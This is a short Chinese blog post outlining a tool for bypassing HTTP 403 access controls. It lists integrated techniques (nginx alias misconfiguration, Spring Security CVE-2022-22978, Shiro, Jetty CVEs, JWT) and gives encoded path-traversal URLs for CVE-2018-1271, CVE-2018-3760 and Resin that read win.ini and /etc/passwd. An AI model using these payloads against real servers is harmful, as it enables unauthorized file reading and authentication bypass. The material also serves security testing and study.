bypass 403 利用工具

前言:bypass 403 利用工具

集成payload

nginx alias配置不当

CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过

X

CVE-2018-1271

http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c
%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini

CVE-2018-3760

http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images
/%252e%252e/%252e%252e/%252e%252e/etc/passwd

shiro bypass permission bypass

参考文章:https://www.cnblogs.com/zpchcbd/p/15023056.html

reverse proxy architecture permission bypass

resin 4.0.65 windows任意文件读取

http://localhost:8080/t1/test.jsp.;xxxx

jetty CVE-2021-28164 CVE-2021-34429 任意文件读取

jwt

posted @   zpchcbd  阅读(435)  评论(0编辑  收藏  举报
相关博文:
· JumpServer CVE-2023-42819 任意文件写入漏洞分析
· CVE-2023-36899 IIS cookieless导致的权限绕过问题
· 学习笔记-绕过访问
· Bypass 403 Forbidden 403页面绕过技巧
· 遇到网站403怎么绕过
阅读排行:
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示